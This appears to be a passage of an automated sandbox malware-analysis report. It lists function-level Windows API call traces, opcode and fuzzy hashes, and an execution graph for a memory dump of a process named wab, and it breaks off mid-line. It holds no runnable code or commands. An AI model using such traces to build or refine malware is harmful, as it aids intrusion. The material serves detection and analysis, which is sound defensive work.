                                                                                                                                                                                          • Opcode Fuzzy Hash: bab4932a8c1e5e09c0a2dddc3bd649a0e515dae4aa8c1f07ed0338a66071ebff
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF0E976540110FBD2216719EC85EBF777CEFC5B74F00401AF948A31819B58784386B5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D15DA Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,374D190E,?,?,00000000,?,00000000), ref: 374D1643
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 374D165A
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,374D190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 374D1661
                                                                                                                                                                                          • lstrcatW.KERNEL32(00001008,?), ref: 374D1686
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcatlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1475610065-0
                                                                                                                                                                                          • Opcode ID: b7c19b0d890893fbe0fe8be200e760cb2ad75a2f8c55af785913b7005d68ff3b
                                                                                                                                                                                          • Instruction ID: a7ac4fa60dd2478f260b0e211aa39698f74f2b79eec897e823473386cbf1be6b
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7c19b0d890893fbe0fe8be200e760cb2ad75a2f8c55af785913b7005d68ff3b
                                                                                                                                                                                          • Instruction Fuzzy Hash: F921B636A00204ABD705DB58EC95EEE77B8EFC9724F14401FE944BB142EB38B542C7A6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D7153 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 374D715C
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 374D717F
                                                                                                                                                                                            • Part of subcall function 374D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 374D5702
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 374D71A5
                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 374D71C7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1794362364-0
                                                                                                                                                                                          • Opcode ID: 1e36df4c2fafbaaf20aef69066ce45027c5fc462e7dc814403b346720ba8f8fc
                                                                                                                                                                                          • Instruction ID: 1ebe7d470f040a714ce2cc84efe7265f591690826a72fbaa192392e12b037e36
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e36df4c2fafbaaf20aef69066ce45027c5fc462e7dc814403b346720ba8f8fc
                                                                                                                                                                                          • Instruction Fuzzy Hash: AF01D8B6A01215FB23134AB64D59DBF6E6DDFC2BA4755022EBC84D7302DE64BC0285B1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,374D1D66,00000000,00000000,?,374D5C88,374D1D66,00000000,00000000,00000000,?,374D5E85,00000006,FlsSetValue), ref: 374D5D13
                                                                                                                                                                                          • GetLastError.KERNEL32(?,374D5C88,374D1D66,00000000,00000000,00000000,?,374D5E85,00000006,FlsSetValue,374DE190,FlsSetValue,00000000,00000364,?,374D5BC8), ref: 374D5D1F
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,374D5C88,374D1D66,00000000,00000000,00000000,?,374D5E85,00000006,FlsSetValue,374DE190,FlsSetValue,00000000), ref: 374D5D2D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                          • Opcode ID: aedb924b66a3ba7cf119133d1fa3363d87e1b433a55813e1b1dd31962050a9b3
                                                                                                                                                                                          • Instruction ID: 8d9f4af77af3f5eaf2c50ee986e1ece2000a9f2a4bc32253afe1a79b2faa362f
                                                                                                                                                                                          • Opcode Fuzzy Hash: aedb924b66a3ba7cf119133d1fa3363d87e1b433a55813e1b1dd31962050a9b3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C012D36641322EBD7118A288C6DA96B7989F457F1F104610F5B5F7242DF24F402CAF0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D69F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetOEMCP.KERNEL32(00000000,?,?,374D6C7C,?), ref: 374D6A1E
                                                                                                                                                                                          • GetACP.KERNEL32(00000000,?,?,374D6C7C,?), ref: 374D6A35
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: |lM7
                                                                                                                                                                                          • API String ID: 0-3154798139
                                                                                                                                                                                          • Opcode ID: 5e32c723154746b1386c2cba7a9bb53e91e2fa6250e8f617c7eaffa54fba4ba6
                                                                                                                                                                                          • Instruction ID: e2c33806f6dc82748b898e6a26760f74cfd46a77fdb7e223f318663bfa4b2c5b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e32c723154746b1386c2cba7a9bb53e91e2fa6250e8f617c7eaffa54fba4ba6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 66F08C30850208CBEB01EBA8C4597AC7770BF45379F149388E4A89A6D3EB7578468B42
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:6.9%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                          Signature Coverage:1.1%
                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                          Total number of Limit Nodes:82
                                                                                                                                                                                          execution_graph 40405 441819 40408 430737 40405->40408 40407 441825 40409 430756 40408->40409 40421 43076d 40408->40421 40410 430774 40409->40410 40411 43075f 40409->40411 40422 43034a 40410->40422 40426 4169a7 11 API calls 40411->40426 40414 4307ce 40416 430819 memset 40414->40416 40417 415b2c 11 API calls 40414->40417 40415 43077e 40415->40414 40419 4307fa 40415->40419 40415->40421 40416->40421 40418 4307e9 40417->40418 40418->40416 40418->40421 40427 4169a7 11 API calls 40419->40427 40421->40407 40423 43034e 40422->40423 40425 430359 40422->40425 40428 415c23 memcpy 40423->40428 40425->40415 40426->40421 40427->40421 40428->40425 37672 442ec6 19 API calls 37849 4152c6 malloc 37850 4152e2 37849->37850 37851 4152ef 37849->37851 37853 416760 11 API calls 37851->37853 37853->37850 37854 4232e8 37855 4232ef 37854->37855 37858 415b2c 37855->37858 37857 423305 37859 415b46 37858->37859 37860 415b42 37858->37860 37859->37857 37860->37859 37861 415b94 37860->37861 37863 415b5a 37860->37863 37865 4438b5 37861->37865 37863->37859 37864 415b79 memcpy 37863->37864 37864->37859 37866 4438d0 37865->37866 37876 4438c9 37865->37876 37879 415378 memcpy memcpy 37866->37879 37876->37859 37880 4466f4 37899 446904 37880->37899 37882 446700 GetModuleHandleA 37885 446710 __set_app_type __p__fmode __p__commode 37882->37885 37884 4467a4 37886 4467ac __setusermatherr 37884->37886 37887 4467b8 37884->37887 37885->37884 37886->37887 37900 4468f0 _controlfp 37887->37900 37889 4467bd _initterm __wgetmainargs _initterm 37890 44681e GetStartupInfoW 37889->37890 37891 446810 37889->37891 37893 446866 GetModuleHandleA 37890->37893 37901 41276d 37893->37901 37897 446896 exit 37898 44689d _cexit 37897->37898 37898->37891 37899->37882 37900->37889 37902 41277d 37901->37902 37944 4044a4 LoadLibraryW 37902->37944 37904 412785 37936 412789 37904->37936 37952 414b81 37904->37952 37907 4127c8 37958 412465 memset ??2@YAPAXI 37907->37958 37909 4127ea 37970 40ac21 37909->37970 37914 412813 37988 40dd07 memset 37914->37988 37915 412827 37993 40db69 memset 37915->37993 37918 412822 38014 4125b6 ??3@YAXPAX 37918->38014 37920 40ada2 _wcsicmp 37921 41283d 37920->37921 37921->37918 37924 412863 CoInitialize 37921->37924 37998 41268e 37921->37998 38018 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37924->38018 37926 41296f 38020 40b633 37926->38020 37931 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37935 412957 37931->37935 37941 4128ca 37931->37941 37935->37918 37936->37897 37936->37898 37937 4128d0 TranslateAcceleratorW 37938 412941 GetMessageW 37937->37938 37937->37941 37938->37935 37938->37937 37939 412909 IsDialogMessageW 37939->37938 37939->37941 37940 4128fd IsDialogMessageW 37940->37938 37940->37939 37941->37937 37941->37939 37941->37940 37942 41292b TranslateMessage DispatchMessageW 37941->37942 37943 41291f IsDialogMessageW 37941->37943 37942->37938 37943->37938 37943->37942 37945 4044cf GetProcAddress 37944->37945 37948 4044f7 37944->37948 37946 4044e8 FreeLibrary 37945->37946 37949 4044df 37945->37949 37947 4044f3 37946->37947 37946->37948 37947->37948 37950 404507 MessageBoxW 37948->37950 37951 40451e 37948->37951 37949->37946 37950->37904 37951->37904 37953 414b8a 37952->37953 37954 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37952->37954 38024 40a804 memset 37953->38024 37954->37907 37957 414b9e GetProcAddress 37957->37954 37960 4124e0 37958->37960 37959 412505 ??2@YAPAXI 37961 41251c 37959->37961 37963 412521 37959->37963 37960->37959 38046 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37961->38046 38035 444722 37963->38035 37969 41259b wcscpy 37969->37909 38051 40b1ab ??3@YAXPAX ??3@YAXPAX 37970->38051 37974 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37981 40ac5c 37974->37981 37975 40ad4b 37983 40ad76 37975->37983 38075 40a9ce 37975->38075 37976 40ace7 ??3@YAXPAX 37976->37981 37981->37974 37981->37975 37981->37976 37981->37983 38055 40a8d0 37981->38055 38067 4099f4 37981->38067 37982 40a8d0 7 API calls 37982->37983 38052 40aa04 37983->38052 37984 40ada2 37985 40adc9 37984->37985 37986 40adaa 37984->37986 37985->37914 37985->37915 37986->37985 37987 40adb3 _wcsicmp 37986->37987 37987->37985 37987->37986 38080 40dce0 37988->38080 37990 40dd3a GetModuleHandleW 38085 40dba7 37990->38085 37994 40dce0 3 API calls 37993->37994 37995 40db99 37994->37995 38157 40dae1 37995->38157 38171 402f3a 37998->38171 38000 412766 38000->37918 38000->37924 38001 4126d3 _wcsicmp 38002 4126a8 38001->38002 38002->38000 38002->38001 38004 41270a 38002->38004 38206 4125f8 7 API calls 38002->38206 38004->38000 38174 411ac5 38004->38174 38015 4125da 38014->38015 38016 4125f0 38015->38016 38017 4125e6 DeleteObject 38015->38017 38019 40b1ab ??3@YAXPAX ??3@YAXPAX 38016->38019 38017->38016 38018->37931 38019->37926 38021 40b640 38020->38021 38022 40b639 ??3@YAXPAX 38020->38022 38023 40b1ab ??3@YAXPAX ??3@YAXPAX 38021->38023 38022->38021 38023->37936 38025 40a83b GetSystemDirectoryW 38024->38025 38026 40a84c wcscpy 38024->38026 38025->38026 38031 409719 wcslen 38026->38031 38029 40a881 LoadLibraryW 38030 40a886 38029->38030 38030->37954 38030->37957 38032 409724 38031->38032 38033 409739 wcscat LoadLibraryW 38031->38033 38032->38033 38034 40972c wcscat 38032->38034 38033->38029 38033->38030 38034->38033 38036 444732 38035->38036 38037 444728 DeleteObject 38035->38037 38047 409cc3 38036->38047 38037->38036 38039 412551 38040 4010f9 38039->38040 38041 401130 38040->38041 38042 401134 GetModuleHandleW LoadIconW 38041->38042 38043 401107 wcsncat 38041->38043 38044 40a7be 38042->38044 38043->38041 38045 40a7d2 38044->38045 38045->37969 38045->38045 38046->37963 38050 409bfd memset wcscpy 38047->38050 38049 409cdb CreateFontIndirectW 38049->38039 38050->38049 38051->37981 38053 40aa14 38052->38053 38054 40aa0a ??3@YAXPAX 38052->38054 38053->37984 38054->38053 38056 40a8eb 38055->38056 38057 40a8df wcslen 38055->38057 38058 40a906 ??3@YAXPAX 38056->38058 38059 40a90f 38056->38059 38057->38056 38061 40a919 38058->38061 38060 4099f4 3 API calls 38059->38060 38060->38061 38062 40a932 38061->38062 38063 40a929 ??3@YAXPAX 38061->38063 38065 4099f4 3 API calls 38062->38065 38064 40a93e memcpy 38063->38064 38064->37981 38066 40a93d 38065->38066 38066->38064 38068 409a41 38067->38068 38069 4099fb malloc 38067->38069 38068->37981 38071 409a37 38069->38071 38072 409a1c 38069->38072 38071->37981 38073 409a30 ??3@YAXPAX 38072->38073 38074 409a20 memcpy 38072->38074 38073->38071 38074->38073 38076 40a9e7 38075->38076 38077 40a9dc ??3@YAXPAX 38075->38077 38079 4099f4 3 API calls 38076->38079 38078 40a9f2 38077->38078 38078->37982 38079->38078 38104 409bca GetModuleFileNameW 38080->38104 38082 40dce6 wcsrchr 38083 40dcf5 38082->38083 38084 40dcf9 wcscat 38082->38084 38083->38084 38084->37990 38105 44db70 38085->38105 38089 40dbfd 38108 4447d9 38089->38108 38092 40dc34 wcscpy wcscpy 38134 40d6f5 38092->38134 38093 40dc1f wcscpy 38093->38092 38096 40d6f5 3 API calls 38097 40dc73 38096->38097 38098 40d6f5 3 API calls 38097->38098 38099 40dc89 38098->38099 38100 40d6f5 3 API calls 38099->38100 38101 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38100->38101 38140 40da80 38101->38140 38104->38082 38106 40dbb4 memset memset 38105->38106 38107 409bca GetModuleFileNameW 38106->38107 38107->38089 38110 4447f4 38108->38110 38109 40dc1b 38109->38092 38109->38093 38110->38109 38111 444807 ??2@YAPAXI 38110->38111 38112 44481f 38111->38112 38113 444873 _snwprintf 38112->38113 38114 4448ab wcscpy 38112->38114 38147 44474a 8 API calls 38113->38147 38116 4448bb 38114->38116 38148 44474a 8 API calls 38116->38148 38117 4448a7 38117->38114 38117->38116 38119 4448cd 38149 44474a 8 API calls 38119->38149 38121 4448e2 38150 44474a 8 API calls 38121->38150 38123 4448f7 38151 44474a 8 API calls 38123->38151 38125 44490c 38152 44474a 8 API calls 38125->38152 38127 444921 38153 44474a 8 API calls 38127->38153 38129 444936 38154 44474a 8 API calls 38129->38154 38131 44494b 38155 44474a 8 API calls 38131->38155 38133 444960 ??3@YAXPAX 38133->38109 38135 44db70 38134->38135 38136 40d702 memset GetPrivateProfileStringW 38135->38136 38137 40d752 38136->38137 38138 40d75c WritePrivateProfileStringW 38136->38138 38137->38138 38139 40d758 38137->38139 38138->38139 38139->38096 38141 44db70 38140->38141 38142 40da8d memset 38141->38142 38143 40daac LoadStringW 38142->38143 38144 40dac6 38143->38144 38144->38143 38146 40dade 38144->38146 38156 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38144->38156 38146->37918 38147->38117 38148->38119 38149->38121 38150->38123 38151->38125 38152->38127 38153->38129 38154->38131 38155->38133 38156->38144 38167 409b98 GetFileAttributesW 38157->38167 38159 40daea 38160 40db63 38159->38160 38161 40daef wcscpy wcscpy GetPrivateProfileIntW 38159->38161 38160->37920 38168 40d65d GetPrivateProfileStringW 38161->38168 38163 40db3e 38169 40d65d GetPrivateProfileStringW 38163->38169 38165 40db4f 38170 40d65d GetPrivateProfileStringW 38165->38170 38167->38159 38168->38163 38169->38165 38170->38160 38207 40eaff 38171->38207 38175 411ae2 memset 38174->38175 38176 411b8f 38174->38176 38247 409bca GetModuleFileNameW 38175->38247 38188 411a8b 38176->38188 38178 411b0a wcsrchr 38179 411b22 wcscat 38178->38179 38180 411b1f 38178->38180 38248 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38179->38248 38180->38179 38182 411b67 38249 402afb 38182->38249 38186 411b7f 38305 40ea13 SendMessageW memset SendMessageW 38186->38305 38189 402afb 27 API calls 38188->38189 38190 411ac0 38189->38190 38191 4110dc 38190->38191 38192 41113e 38191->38192 38197 4110f0 38191->38197 38330 40969c LoadCursorW SetCursor 38192->38330 38194 411143 38204 40b633 ??3@YAXPAX 38194->38204 38331 444a54 38194->38331 38334 4032b4 38194->38334 38195 4110f7 _wcsicmp 38195->38197 38196 411157 38198 40ada2 _wcsicmp 38196->38198 38197->38192 38197->38195 38352 410c46 10 API calls 38197->38352 38201 411167 38198->38201 38199 4111af 38201->38199 38202 4111a6 qsort 38201->38202 38202->38199 38204->38196 38206->38002 38208 40eb10 38207->38208 38220 40e8e0 38208->38220 38211 40eb6c memcpy memcpy 38212 40ebb7 38211->38212 38212->38211 38213 40ebf2 ??2@YAPAXI ??2@YAPAXI 38212->38213 38216 40d134 16 API calls 38212->38216 38214 40ec2e ??2@YAPAXI 38213->38214 38217 40ec65 38213->38217 38214->38217 38216->38212 38217->38217 38230 40ea7f 38217->38230 38219 402f49 38219->38002 38221 40e8f2 38220->38221 38222 40e8eb ??3@YAXPAX 38220->38222 38223 40e900 38221->38223 38224 40e8f9 ??3@YAXPAX 38221->38224 38222->38221 38225 40e911 38223->38225 38226 40e90a ??3@YAXPAX 38223->38226 38224->38223 38227 40e931 ??2@YAPAXI ??2@YAPAXI 38225->38227 38228 40e921 ??3@YAXPAX 38225->38228 38229 40e92a ??3@YAXPAX 38225->38229 38226->38225 38227->38211 38228->38229 38229->38227 38231 40aa04 ??3@YAXPAX 38230->38231 38232 40ea88 38231->38232 38233 40aa04 ??3@YAXPAX 38232->38233 38234 40ea90 38233->38234 38235 40aa04 ??3@YAXPAX 38234->38235 38236 40ea98 38235->38236 38237 40aa04 ??3@YAXPAX 38236->38237 38238 40eaa0 38237->38238 38239 40a9ce 4 API calls 38238->38239 38240 40eab3 38239->38240 38241 40a9ce 4 API calls 38240->38241 38242 40eabd 38241->38242 38243 40a9ce 4 API calls 38242->38243 38244 40eac7 38243->38244 38245 40a9ce 4 API calls 38244->38245 38246 40ead1 38245->38246 38246->38219 38247->38178 38248->38182 38306 40b2cc 38249->38306 38251 402b0a 38252 40b2cc 27 API calls 38251->38252 38253 402b23 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402b3a 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402b54 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402b6b 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402b82 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402b99 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402bb0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402bc7 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402bde 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402bf5 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402c0c 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402c23 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402c3a 38276->38277 38278 40b2cc 27 API calls 38277->38278 38279 402c51 38278->38279 38280 40b2cc 27 API calls 38279->38280 38281 402c68 38280->38281 38282 40b2cc 27 API calls 38281->38282 38283 402c7f 38282->38283 38284 40b2cc 27 API calls 38283->38284 38285 402c99 38284->38285 38286 40b2cc 27 API calls 38285->38286 38287 402cb3 38286->38287 38288 40b2cc 27 API calls 38287->38288 38289 402cd5 38288->38289 38290 40b2cc 27 API calls 38289->38290 38291 402cf0 38290->38291 38292 40b2cc 27 API calls 38291->38292 38293 402d0b 38292->38293 38294 40b2cc 27 API calls 38293->38294 38295 402d26 38294->38295 38296 40b2cc 27 API calls 38295->38296 38297 402d3e 38296->38297 38298 40b2cc 27 API calls 38297->38298 38299 402d59 38298->38299 38300 40b2cc 27 API calls 38299->38300 38301 402d78 38300->38301 38302 40b2cc 27 API calls 38301->38302 38303 402d93 38302->38303 38304 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38303->38304 38304->38186 38305->38176 38309 40b58d 38306->38309 38308 40b2d1 38308->38251 38310 40b5a4 GetModuleHandleW FindResourceW 38309->38310 38311 40b62e 38309->38311 38312 40b5c2 LoadResource 38310->38312 38314 40b5e7 38310->38314 38311->38308 38313 40b5d0 SizeofResource LockResource 38312->38313 38312->38314 38313->38314 38314->38311 38322 40afcf 38314->38322 38316 40b608 memcpy 38325 40b4d3 memcpy 38316->38325 38318 40b61e 38326 40b3c1 18 API calls 38318->38326 38320 40b626 38327 40b04b 38320->38327 38323 40b04b ??3@YAXPAX 38322->38323 38324 40afd7 ??2@YAPAXI 38323->38324 38324->38316 38325->38318 38326->38320 38328 40b051 ??3@YAXPAX 38327->38328 38329 40b05f 38327->38329 38328->38329 38329->38311 38330->38194 38332 444a64 FreeLibrary 38331->38332 38333 444a83 38331->38333 38332->38333 38333->38196 38335 4032c4 38334->38335 38336 40b633 ??3@YAXPAX 38335->38336 38337 403316 38336->38337 38353 44553b 38337->38353 38341 403480 38549 40368c 15 API calls 38341->38549 38343 403489 38344 40b633 ??3@YAXPAX 38343->38344 38345 403495 38344->38345 38345->38196 38346 4033a9 memset memcpy 38347 4033ec wcscmp 38346->38347 38348 40333c 38346->38348 38347->38348 38348->38341 38348->38346 38348->38347 38547 4028e7 11 API calls 38348->38547 38548 40f508 6 API calls 38348->38548 38350 403421 _wcsicmp 38350->38348 38352->38197 38354 445548 38353->38354 38355 445599 38354->38355 38550 40c768 38354->38550 38356 4455a8 memset 38355->38356 38362 4457f2 38355->38362 38633 403988 38356->38633 38365 445854 38362->38365 38735 403e2d memset memset memset memset memset 38362->38735 38416 4458aa 38365->38416 38758 403c9c memset memset memset memset memset 38365->38758 38366 4458bb memset memset 38368 414c2e 16 API calls 38366->38368 38367 4455e5 38373 445672 38367->38373 38378 44560f 38367->38378 38371 4458f9 38368->38371 38370 44595e memset memset 38376 414c2e 16 API calls 38370->38376 38377 40b2cc 27 API calls 38371->38377 38644 403fbe memset memset memset memset memset 38373->38644 38374 445a00 memset memset 38781 414c2e 38374->38781 38375 445b22 38381 445bca 38375->38381 38382 445b38 memset memset memset 38375->38382 38386 44599c 38376->38386 38387 445909 38377->38387 38389 4087b3 338 API calls 38378->38389 38379 44557a 38413 44558c 38379->38413 38830 41366b FreeLibrary 38379->38830 38380 445849 38845 40b1ab ??3@YAXPAX ??3@YAXPAX 38380->38845 38388 445c8b memset memset 38381->38388 38455 445cf0 38381->38455 38391 445bd4 38382->38391 38392 445b98 38382->38392 38395 40b2cc 27 API calls 38386->38395 38397 409d1f 6 API calls 38387->38397 38400 414c2e 16 API calls 38388->38400 38398 445621 38389->38398 38390 44589f 38846 40b1ab ??3@YAXPAX ??3@YAXPAX 38390->38846 38406 414c2e 16 API calls 38391->38406 38392->38391 38402 445ba2 38392->38402 38399 4459ac 38395->38399 38396 403335 38546 4452e5 45 API calls 38396->38546 38409 445919 38397->38409 38831 4454bf 20 API calls 38398->38831 38411 409d1f 6 API calls 38399->38411 38412 445cc9 38400->38412 38919 4099c6 wcslen 38402->38919 38403 4456b2 38833 40b1ab ??3@YAXPAX ??3@YAXPAX 38403->38833 38405 40b2cc 27 API calls 38417 445a4f 38405->38417 38419 445be2 38406->38419 38407 445d3d 38440 40b2cc 27 API calls 38407->38440 38408 445d88 memset memset memset 38423 414c2e 16 API calls 38408->38423 38847 409b98 GetFileAttributesW 38409->38847 38410 445823 38410->38380 38422 4087b3 338 API calls 38410->38422 38424 4459bc 38411->38424 38425 409d1f 6 API calls 38412->38425 38617 444b06 38413->38617 38414 445879 38414->38390 38435 4087b3 338 API calls 38414->38435 38416->38366 38441 44594a 38416->38441 38796 409d1f wcslen wcslen 38417->38796 38420 40b2cc 27 API calls 38419->38420 38429 445bf3 38420->38429 38422->38410 38432 445dde 38423->38432 38915 409b98 GetFileAttributesW 38424->38915 38434 445ce1 38425->38434 38426 445bb3 38922 445403 memset 38426->38922 38427 445680 38427->38403 38667 4087b3 memset 38427->38667 38439 409d1f 6 API calls 38429->38439 38430 445928 38430->38441 38848 40b6ef 38430->38848 38442 40b2cc 27 API calls 38432->38442 38939 409b98 GetFileAttributesW 38434->38939 38435->38414 38438 40b2cc 27 API calls 38447 445a94 38438->38447 38449 445c07 38439->38449 38450 445d54 _wcsicmp 38440->38450 38441->38370 38454 4459ed 38441->38454 38453 445def 38442->38453 38443 4459cb 38443->38454 38463 40b6ef 252 API calls 38443->38463 38801 40ae18 38447->38801 38448 44566d 38448->38362 38718 413d4c 38448->38718 38459 445389 258 API calls 38449->38459 38460 445d71 38450->38460 38525 445d67 38450->38525 38452 445665 38832 40b1ab ??3@YAXPAX ??3@YAXPAX 38452->38832 38461 409d1f 6 API calls 38453->38461 38454->38374 38454->38375 38455->38396 38455->38407 38455->38408 38456 445389 258 API calls 38456->38381 38465 445c17 38459->38465 38940 445093 23 API calls 38460->38940 38468 445e03 38461->38468 38463->38454 38464 4456d8 38470 40b2cc 27 API calls 38464->38470 38471 40b2cc 27 API calls 38465->38471 38467 44563c 38467->38452 38473 4087b3 338 API calls 38467->38473 38941 409b98 GetFileAttributesW 38468->38941 38469 40b6ef 252 API calls 38469->38396 38475 4456e2 38470->38475 38476 445c23 38471->38476 38472 445d83 38472->38396 38473->38467 38834 413fa6 _wcsicmp _wcsicmp 38475->38834 38480 409d1f 6 API calls 38476->38480 38478 445e12 38485 445e6b 38478->38485 38491 40b2cc 27 API calls 38478->38491 38483 445c37 38480->38483 38481 445aa1 38484 445b17 38481->38484 38499 445ab2 memset 38481->38499 38512 409d1f 6 API calls 38481->38512 38808 40add4 38481->38808 38813 445389 38481->38813 38822 40ae51 38481->38822 38482 4456eb 38487 4456fd memset memset memset memset 38482->38487 38488 4457ea 38482->38488 38489 445389 258 API calls 38483->38489 38916 40aebe 38484->38916 38943 445093 23 API calls 38485->38943 38835 409c70 wcscpy wcsrchr 38487->38835 38838 413d29 38488->38838 38495 445c47 38489->38495 38496 445e33 38491->38496 38493 445e7e 38498 445f67 38493->38498 38501 40b2cc 27 API calls 38495->38501 38502 409d1f 6 API calls 38496->38502 38507 40b2cc 27 API calls 38498->38507 38503 40b2cc 27 API calls 38499->38503 38505 445c53 38501->38505 38506 445e47 38502->38506 38503->38481 38504 409c70 2 API calls 38508 44577e 38504->38508 38509 409d1f 6 API calls 38505->38509 38942 409b98 GetFileAttributesW 38506->38942 38511 445f73 38507->38511 38513 409c70 2 API calls 38508->38513 38514 445c67 38509->38514 38516 409d1f 6 API calls 38511->38516 38512->38481 38517 44578d 38513->38517 38518 445389 258 API calls 38514->38518 38515 445e56 38515->38485 38521 445e83 memset 38515->38521 38519 445f87 38516->38519 38517->38488 38524 40b2cc 27 